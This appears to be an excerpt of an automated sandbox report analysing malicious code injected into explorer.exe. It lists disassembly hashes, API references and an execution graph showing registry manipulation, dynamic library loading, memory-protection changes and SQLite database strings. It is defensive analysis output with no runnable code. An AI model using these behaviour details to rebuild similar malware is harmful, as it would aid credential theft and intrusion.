                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                • API String ID: 3510742995-3408036318
                                                                                                                                                                • Opcode ID: 779f80ea5ab52e348ae1a182b3283ec163b462419dcc0bb04fe764faf8378b6f
                                                                                                                                                                • Instruction ID: 1cf14acd85c3288f0c993ee16c1bb83560b441ae735ab0a4a2572ebf7324cfaf
                                                                                                                                                                • Opcode Fuzzy Hash: 779f80ea5ab52e348ae1a182b3283ec163b462419dcc0bb04fe764faf8378b6f
                                                                                                                                                                • Instruction Fuzzy Hash: 75D1E7B1A183419FC714DF24C881B1ABBE1AF95314F08497DFC998B392DB75D905CB62
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: %$-x0$NaN
                                                                                                                                                                • API String ID: 0-62881354
                                                                                                                                                                • Opcode ID: 18ea6547e41a2ac3fc37b27c86ce80245ab42f2a43365b6fcc108535493afbc6
                                                                                                                                                                • Instruction ID: f4cda12ea1f81a74b685643f38ac0cce6df6dbeda1448281b1ece7bb80229a93
                                                                                                                                                                • Opcode Fuzzy Hash: 18ea6547e41a2ac3fc37b27c86ce80245ab42f2a43365b6fcc108535493afbc6
                                                                                                                                                                • Instruction Fuzzy Hash: 7BD103B062C3829BD7358F29849437FBFE1AF99304F284A5DF8D187351D664CA45EB82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -x0$NaN
                                                                                                                                                                • API String ID: 0-3447725786
                                                                                                                                                                • Opcode ID: 1b7f68a6ad505f2e4e6e8004fbdb5857aebaa575b62226f1c1176d5cae223147
                                                                                                                                                                • Instruction ID: 66a803ecb30662187fe4e7eacba388dfc2bac4cafe4e0a3241bf16624a1078ae
                                                                                                                                                                • Opcode Fuzzy Hash: 1b7f68a6ad505f2e4e6e8004fbdb5857aebaa575b62226f1c1176d5cae223147
                                                                                                                                                                • Instruction Fuzzy Hash: DEE134B062C3829BD7358E29C49437FBBE1AF89304F284A5DF8D287351D660CE45E782
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -x0$NaN
                                                                                                                                                                • API String ID: 0-3447725786
                                                                                                                                                                • Opcode ID: fe3414a1215ce5daeccc9028f7a1fd0b61c05160316d70c0a15c08eaffa66340
                                                                                                                                                                • Instruction ID: 6b9d23070f70979a9f5f7bbb9ac41bb2b4d976c1b17d49a2d14888b1781d3156
                                                                                                                                                                • Opcode Fuzzy Hash: fe3414a1215ce5daeccc9028f7a1fd0b61c05160316d70c0a15c08eaffa66340
                                                                                                                                                                • Instruction Fuzzy Hash: 57E101B062C3829BD7358F29C49072FBBE1AF9A304F248A5DF8D187351D664CE45DB82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -x0$NaN
                                                                                                                                                                • API String ID: 0-3447725786
                                                                                                                                                                • Opcode ID: 5b83757daad9a8fe174f49d45c508761db2ef2573b5099dbce6289432b5e0423
                                                                                                                                                                • Instruction ID: 51e3d2244c4e1d7f21f6a86bad9bd96c92154ba636d7bc2210d85b2492b8627b
                                                                                                                                                                • Opcode Fuzzy Hash: 5b83757daad9a8fe174f49d45c508761db2ef2573b5099dbce6289432b5e0423
                                                                                                                                                                • Instruction Fuzzy Hash: 97E124B062C3829BD7358F29C49432FBBE1AF99304F248A5DF8D187351D674CA45DB82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -x0$NaN
                                                                                                                                                                • API String ID: 0-3447725786
                                                                                                                                                                • Opcode ID: 8a79daab14c56ec0a0807deb029325bd031088bcf89cccc0328d594593f49e86
                                                                                                                                                                • Instruction ID: c29642700f8b78ef7da80000b6ff7b1b824fba503cfa0a4368b5c509a2802b76
                                                                                                                                                                • Opcode Fuzzy Hash: 8a79daab14c56ec0a0807deb029325bd031088bcf89cccc0328d594593f49e86
                                                                                                                                                                • Instruction Fuzzy Hash: DAE112B062C3829FD7358F29C49472FBBE1AF99304F244A5DF8D187351D664CA45DB42
                                                                                                                                                                APIs
                                                                                                                                                                • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00C3720E
                                                                                                                                                                • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00C37226
                                                                                                                                                                • _aulldvrm.NTDLL(00000000,00000000,?), ref: 00C3727B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _aulldvrm$_aullrem
                                                                                                                                                                • String ID: -x0$NaN
                                                                                                                                                                • API String ID: 105165338-3447725786
                                                                                                                                                                • Opcode ID: fd4c173f6f79fb435272a824674e845efe2e8b241a6d47b085890ff3a3f3216d
                                                                                                                                                                • Instruction ID: 7f2b67310a2373960cff2cb46b3f87db9117022202305fa4290c356a7013457d
                                                                                                                                                                • Opcode Fuzzy Hash: fd4c173f6f79fb435272a824674e845efe2e8b241a6d47b085890ff3a3f3216d
                                                                                                                                                                • Instruction Fuzzy Hash: F9D103B062C3829BD7358F29849437FBFE1AF99304F284A5DF8D187351D664CA45DB82
                                                                                                                                                                APIs
                                                                                                                                                                • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00C38AAD
                                                                                                                                                                • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00C38B66
                                                                                                                                                                • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00C38C9B
                                                                                                                                                                • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00C38CAE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _allmul$_alldvrm
                                                                                                                                                                • String ID: .
                                                                                                                                                                • API String ID: 115548886-248832578
                                                                                                                                                                • Opcode ID: 64f9232be394405045f481b5336b2272a04692f9f38458a5cb760d89cdbe852f
                                                                                                                                                                • Instruction ID: ba39ec4997d91defcb2119e882d22527b1f5e45e11e667fa10902bb0971752e1
                                                                                                                                                                • Opcode Fuzzy Hash: 64f9232be394405045f481b5336b2272a04692f9f38458a5cb760d89cdbe852f
                                                                                                                                                                • Instruction Fuzzy Hash: 32D115B191C7858BC720DF59988033EFBF0BBD5714F04095EF6D596281DBB1CA4A8B86
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: ,$7$9
                                                                                                                                                                • API String ID: 2221118986-1653249994
                                                                                                                                                                • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                • Instruction ID: 1fbe731c2eec562a58757fbaeaf99cefc02bea031903d696101fc2459c5a4237
                                                                                                                                                                • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                • Instruction Fuzzy Hash: 03314B715083449FD730DF64D880B8FBBE9AF85384F00892EF98997251EB71964DCBA6
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(00000000,00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BCC
                                                                                                                                                                • StrStrIW.SHLWAPI(00000000,.exe,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BF0
                                                                                                                                                                • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C05
                                                                                                                                                                • lstrlenW.KERNEL32(00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C1C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                • String ID: .exe
                                                                                                                                                                • API String ID: 1659193697-4119554291
                                                                                                                                                                • Opcode ID: d6ba7e95acf3b1ce1ed5ea700672571d8ce629f019554eb2e5420cc5c5f86c24
                                                                                                                                                                • Instruction ID: 18b03f2188d973f527e13184179e3d5a05bb6addeee822cafc516f372df21e1d
                                                                                                                                                                • Opcode Fuzzy Hash: d6ba7e95acf3b1ce1ed5ea700672571d8ce629f019554eb2e5420cc5c5f86c24
                                                                                                                                                                • Instruction Fuzzy Hash: 19F062313602219FD7246F34AC49BBF62A4EF05351F18586AE946D31A1EB608E41C79D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C32127
                                                                                                                                                                • _alldiv.NTDLL(?,?,00989680,00000000), ref: 00C3213A
                                                                                                                                                                • wsprintfA.USER32 ref: 00C3214F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                                • String ID: %li
                                                                                                                                                                • API String ID: 4120667308-1021419598
                                                                                                                                                                • Opcode ID: 3cdf3ab9c7e35303298b7cc0431a55cd3f0b963aec123e9a9ddf5212d6292e97
                                                                                                                                                                • Instruction ID: 6e1617e5b4f4b54f6a95673da654f58e29c941b21705617ab65e13bae652ca64
                                                                                                                                                                • Opcode Fuzzy Hash: 3cdf3ab9c7e35303298b7cc0431a55cd3f0b963aec123e9a9ddf5212d6292e97
                                                                                                                                                                • Instruction Fuzzy Hash: FFE0D8326402087BC7203BB89C0AFEF7B6CDB40B19F044191F900F6182E5724A2493D9
                                                                                                                                                                APIs
                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000018), ref: 00C4316F
                                                                                                                                                                • _allmul.NTDLL(-00000001,00000000,?,?), ref: 00C431D2
                                                                                                                                                                • _alldiv.NTDLL(?,?,00000000), ref: 00C432DE
                                                                                                                                                                • _allmul.NTDLL(00000000,?,00000000), ref: 00C432E7
                                                                                                                                                                • _allmul.NTDLL(?,00000000,?,?), ref: 00C43392
                                                                                                                                                                  • Part of subcall function 00C416CD: memset.NTDLL ref: 00C4172B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _allmul$_alldivmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3880648599-0
                                                                                                                                                                • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                • Instruction ID: 84fbe9b05e4444ea29488f0fa4e4f1c38af9bfd965bd87f837f85a6a00020482
                                                                                                                                                                • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                • Instruction Fuzzy Hash: 37D189716083818BDB24DF69C480B6EBBE1BFC8704F14492DF9A587261DB70DE46CB92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                                                • API String ID: 0-384346570
                                                                                                                                                                • Opcode ID: a223d6bd214c1b92117d8f4f3c21318978039305b23c0dec721b1e02411ae995
                                                                                                                                                                • Instruction ID: cd38b0644d38a910561d0712d9958dcfa797bceb0bd9f42802ab3211938ae4e6
                                                                                                                                                                • Opcode Fuzzy Hash: a223d6bd214c1b92117d8f4f3c21318978039305b23c0dec721b1e02411ae995
                                                                                                                                                                • Instruction Fuzzy Hash: 55D14B74708300AFD724DF25C881B2FBBE9ABC8750F104A1EF9458B291DB74D989DB96
                                                                                                                                                                APIs
                                                                                                                                                                • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00C396E7
                                                                                                                                                                • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00C39707
                                                                                                                                                                • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00C39739
                                                                                                                                                                • _alldiv.NTDLL(00000001,80000000,?,?), ref: 00C3976C
                                                                                                                                                                • _allmul.NTDLL(?,?,?,?), ref: 00C39798
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _alldiv$_allmul
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4215241517-0
                                                                                                                                                                • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                • Instruction ID: 99367503d96dc5002108ab4dab652430377104420b729b0236013416dfa75678
                                                                                                                                                                • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                • Instruction Fuzzy Hash: 272127312397552AD7747D1A8CC2B2B76A8CBD37A4F24412EFD23C22D1E9F28C4085A1
                                                                                                                                                                APIs
                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000), ref: 00C4B1B3
                                                                                                                                                                • _alldvrm.NTDLL(?,?,00000000), ref: 00C4B20F
                                                                                                                                                                • _allrem.NTDLL(?,00000000,?,?), ref: 00C4B28A
                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00C4B298
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1484705121-0
                                                                                                                                                                • Opcode ID: 6c59070d6f8374fcd7fc8a65f60d9711abbfbf526d7af0219c6e8549b4ec9b69
                                                                                                                                                                • Instruction ID: 3a2a34367274ed88928eb4a861108e1b2fed4f7b9c8be8f7d44ae856c011d8a9
                                                                                                                                                                • Opcode Fuzzy Hash: 6c59070d6f8374fcd7fc8a65f60d9711abbfbf526d7af0219c6e8549b4ec9b69
                                                                                                                                                                • Instruction Fuzzy Hash: 044126756083019FC718EF29C891A2EBBE6BFC8300F14892DF99587262DB71ED05DB52
                                                                                                                                                                APIs
                                                                                                                                                                • GetHGlobalFromStream.COMBASE(?,?), ref: 00C318A7
                                                                                                                                                                • GlobalLock.KERNEL32(00C34B57), ref: 00C318B6
                                                                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 00C318F4
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C318E8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1688112647-0
                                                                                                                                                                • Opcode ID: 4d4e8670019056a5878584ca689d27323cb9736d52d9eb01e64abe0ef8707e92
                                                                                                                                                                • Instruction ID: 2dce64f628807ef39e18b733557873b794d600cb11cec790d26c6f3b764a2f42
                                                                                                                                                                • Opcode Fuzzy Hash: 4d4e8670019056a5878584ca689d27323cb9736d52d9eb01e64abe0ef8707e92
                                                                                                                                                                • Instruction Fuzzy Hash: 2B016D75210306AF8B015F69AC58A9FBBA9EF84351F08843AF85587260DF31C9049B69
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                • lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                • lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcatlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1475610065-0
                                                                                                                                                                • Opcode ID: 835c6c75e3a1ec51ac56811d7904d661500f5d4ccc1490fa41010e31c9cafc68
                                                                                                                                                                • Instruction ID: 8f6d54efa7a02a429c78e9921f593d68de5387d8fc37e31e9494bbf317a3a959
                                                                                                                                                                • Opcode Fuzzy Hash: 835c6c75e3a1ec51ac56811d7904d661500f5d4ccc1490fa41010e31c9cafc68
                                                                                                                                                                • Instruction Fuzzy Hash: 7DE06DA230021C2F472477AE9C94F7B7A9CCAC96A57090039FE08D3302EE56AC0546B8
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C36A81: memset.NTDLL ref: 00C36A9C
                                                                                                                                                                • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 00C5F2A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _aulldivmemset
                                                                                                                                                                • String ID: %llu$%llu
                                                                                                                                                                • API String ID: 714058258-4283164361
                                                                                                                                                                • Opcode ID: 5e3c188adbf3beb2eb3698d98f0e680b9970f6df31342c7dda641a8e0cfcc2a4
                                                                                                                                                                • Instruction ID: 1576453bf093db29d7f9fa540c7de178e8710b81c65de5548bf96a42c2f2a1de
                                                                                                                                                                • Opcode Fuzzy Hash: 5e3c188adbf3beb2eb3698d98f0e680b9970f6df31342c7dda641a8e0cfcc2a4
                                                                                                                                                                • Instruction Fuzzy Hash: D62123B26446057BC714AA64CC42F6BB7A8EF85730F04433CF922972C1DB20DD1697E5
                                                                                                                                                                APIs
                                                                                                                                                                • _allmul.NTDLL(?,00000000,?), ref: 00C42174
                                                                                                                                                                • _allmul.NTDLL(?,?,?,00000000), ref: 00C4220E
                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,?), ref: 00C42241
                                                                                                                                                                • _allmul.NTDLL(00C32E26,00000000,?,?), ref: 00C42295
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _allmul
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4029198491-0
                                                                                                                                                                • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                • Instruction ID: 9f73f87525f9cdbc15c95d2ba5768b681000fd8e9ead9f1422fb736aae52dfc9
                                                                                                                                                                • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                • Instruction Fuzzy Hash: D0A18C707087019BD724EF65C882A2EB7E5BFD8754F40482CFA958B261EBB0ED458B42
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                                • Opcode ID: bee109c9e61ecd5cd23fbb9cf3c2bcfa4cb41aac7cb38f3f7afcac6f8fd0f8ac
                                                                                                                                                                • Instruction ID: bfd063b31989d0d1dc671378eeba1efcf57b08997bd6c0b6afbc821dd866415d
                                                                                                                                                                • Opcode Fuzzy Hash: bee109c9e61ecd5cd23fbb9cf3c2bcfa4cb41aac7cb38f3f7afcac6f8fd0f8ac
                                                                                                                                                                • Instruction Fuzzy Hash: 1F818D716083149FC350EF29C984A2BBBE5FF98704F144A2DF88A97352E770EA05DB91
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00C31946
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcatlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1475610065-0
                                                                                                                                                                • Opcode ID: 51fee66fda773f04346fbdcf73e182227703a289fc0d0df442ee829c78a6c26f
                                                                                                                                                                • Instruction ID: 4986616d7e7efef20370db26f8cb181d41483896bf9a9cf4d229e8f79d2a7ea5
                                                                                                                                                                • Opcode Fuzzy Hash: 51fee66fda773f04346fbdcf73e182227703a289fc0d0df442ee829c78a6c26f
                                                                                                                                                                • Instruction Fuzzy Hash: AAE06DA230021C2F4A2076AE6C94F7BB69CCAD96A57090035FE04C3202EA56AC0187B8

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:20.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:181
                                                                                                                                                                Total number of Limit Nodes:17
                                                                                                                                                                execution_graph 1074 d3a1e0 1075 d3a1e6 1074->1075 1076 d3a298 3 API calls 1075->1076 1077 d3a248 1076->1077 1008 d337f4 1009 d33804 1008->1009 1016 d3372c 1009->1016 1013 d33817 1014 d3387c 1013->1014 1026 d336c8 1013->1026 1017 d3375a 1016->1017 1018 d33777 RegCreateKeyExW 1017->1018 1019 d337cd 1018->1019 1020 d337bc RegCloseKey 1018->1020 1034 d31860 1019->1034 1020->1019 1023 d322b4 1024 d322d6 1023->1024 1025 d322c8 CreateStreamOnHGlobal 1023->1025 1024->1013 1025->1024 1027 d336cd 1026->1027 1032 d3371e 1026->1032 1028 d33716 1027->1028 1038 d321e4 1027->1038 1030 d31860 RtlFreeHeap 1028->1030 1030->1032 1031 d33706 1033 d31860 RtlFreeHeap 1031->1033 1032->1014 1033->1028 1035 d3186e 1034->1035 1036 d31886 1035->1036 1037 d31878 RtlFreeHeap 1035->1037 1036->1014 1036->1023 1037->1036 1039 d3220b 1038->1039 1044 d31e20 1039->1044 1042 d31860 RtlFreeHeap 1043 d32297 1042->1043 1043->1031 1054 d31e6d 1044->1054 1045 d321b5 1046 d31860 RtlFreeHeap 1045->1046 1047 d321cb 1046->1047 1047->1042 1048 d3219b 1048->1045 1049 d31860 RtlFreeHeap 1048->1049 1049->1045 1050 d32177 1051 d31860 RtlFreeHeap 1050->1051 1052 d3218e 1051->1052 1052->1048 1053 d31860 RtlFreeHeap 1052->1053 1053->1048 1054->1045 1054->1048 1054->1050 1055 d31860 RtlFreeHeap 1054->1055 1055->1050 1063 d3a1f9 1064 d3a228 1063->1064 1066 d3a248 1063->1066 1067 d3a298 1064->1067 1069 d3a29d 1067->1069 1068 d3a385 LoadLibraryA 1068->1069 1069->1068 1071 d3a3e0 VirtualProtect VirtualProtect 1069->1071 1073 d3a3d5 1069->1073 1072 d3a46e 1071->1072 1073->1066 1056 d3a298 1058 d3a29d 1056->1058 1057 d3a385 LoadLibraryA 1057->1058 1058->1057 1060 d3a3e0 VirtualProtect VirtualProtect 1058->1060 1062 d3a3d5 1058->1062 1061 d3a46e 1060->1061 1078 d33668 1083 d33458 StrStrIW 1078->1083 1081 d33458 17 API calls 1082 d336bd 1081->1082 1084 d3350f 1083->1084 1085 d3348f 1083->1085 1087 d33523 RegOpenKeyExW 1084->1087 1108 d32774 1085->1108 1088 d335e4 1087->1088 1099 d3354d 1087->1099 1089 d31860 RtlFreeHeap 1088->1089 1091 d335f7 1089->1091 1090 d335b5 RegEnumKeyExW 1090->1088 1090->1099 1091->1081 1092 d334a8 1092->1084 1093 d33507 1092->1093 1121 d328a0 1092->1121 1095 d31860 RtlFreeHeap 1093->1095 1095->1084 1097 d32700 RtlFreeHeap 1097->1099 1098 d334fa 1102 d31860 